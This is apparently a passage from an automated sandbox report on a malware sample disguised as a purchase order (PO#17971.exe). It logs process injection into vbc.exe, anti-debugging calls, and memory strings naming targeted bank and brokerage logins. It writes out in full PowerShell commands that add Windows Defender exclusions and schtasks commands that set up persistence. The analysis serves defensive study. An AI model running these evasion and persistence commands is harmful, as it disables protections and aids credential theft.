Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599421
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599093
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597123
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596905
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596685
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596356
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596009
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595565
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594997
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594342

Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: PO#17971.exe, 00000000.00000002.2084564169.0000000000C54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: vbc.exe, 00000009.00000002.4510604526.000000000526C000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4510545821.000000000057E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: PO#17971.exe, 00000000.00000002.2087845896.0000000003E94000.00000004.00000800.00020000.00000000.sdmp, PO#17971.exe, 00000000.00000002.2094114410.0000000008C30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: H1rSGQEmUV
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: vbc.exe, 00000010.00000002.4521159554.0000000007D8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: vbc.exe, 00000010.00000002.4521159554.0000000007DE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

API call chain: ExitProcess graph end node

graph_9-40085

Source: C:\Users\user\Desktop\PO#17971.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

9_2_0040CE09

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

9_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

9_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 9_2_0040ADB0 GetProcessHeap,HeapFree,

9_2_0040ADB0

Source: C:\Users\user\Desktop\PO#17971.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 9_2_004123F1 SetUnhandledExceptionFilter,	9_2_004123F1

Source: C:\Users\user\Desktop\PO#17971.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\PO#17971.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#17971.exe"
Source: C:\Users\user\Desktop\PO#17971.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TZRtlifudvO.exe"
Source: C:\Users\user\Desktop\PO#17971.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#17971.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TZRtlifudvO.exe"	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\PO#17971.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\PO#17971.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PO#17971.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41B000	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 422000	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 426000	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 4FE2008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41B000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 422000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 426000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 2E9008	Jump to behavior

Source: C:\Users\user\Desktop\PO#17971.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#17971.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TZRtlifudvO.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp55D6.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TZRtlifudvO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BBF.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: GetLocaleInfoA,

9_2_00417A20

Source: C:\Users\user\Desktop\PO#17971.exe	Queries volume information: C:\Users\user\Desktop\PO#17971.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
